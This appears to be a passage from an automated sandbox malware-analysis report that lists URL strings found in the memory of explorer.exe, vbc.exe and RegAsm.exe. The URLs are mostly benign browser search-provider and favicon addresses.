          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2195388777.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000008.00000000.2195388777.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, 00000004.00000003.2189382975.0000000004C60000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2198730467.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: vbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
